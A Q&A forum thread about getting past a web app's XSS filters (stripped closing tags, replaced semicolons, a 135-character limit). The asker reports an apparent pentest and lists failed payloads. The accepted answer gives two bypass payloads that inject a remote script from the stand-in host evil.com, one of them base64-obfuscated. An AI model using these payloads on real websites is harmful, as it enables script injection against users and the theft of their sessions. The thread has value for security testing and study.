How to abuse XSS with specific criteria or filters?

627 views Asked by At

I have found a web app that is vulnerable to XSS, and can get some javascript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.

The filters I have detected so far are as follows:

  • </anythingyouwant> gets replaced with nothing
  • /> gets replaced with nothing
  • ; gets replaced with a space until the next >
  • 135 character limit including method of delivery ex <img src="." onerror="alert('xss')">

Injecting <img src="." onerror="alert('xss')"> works fine, however these developers are rather sceptical and wish to see a full PoC of full javascript code. Is it possible to run an arbitrary script at all?

I have tried:

  • <img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))"> result: too long, even with a shortened URL
  • <script src="//evil.com/myscript" /> result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag
  • <script src=//evil.com/myscript"></script> result: gets filtered, destroys rest of page as above
  • <img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)"> result: semicolons get filtered, breaks web page
  • <img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)"> result: im unsure if this is valid js, but it appears in the chrome view page source as intended, but does not work as wanted

I am using chrome for testing, just in case it's relevant somehow.

1

There are 1 answers

0
likle On BEST ANSWER

The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:

<img src="." onerror="document.write('<script src=\'//evil.com/myscript\'><'+'/'+'script>')">

or your version with a , instead of a ;:

<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">

But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.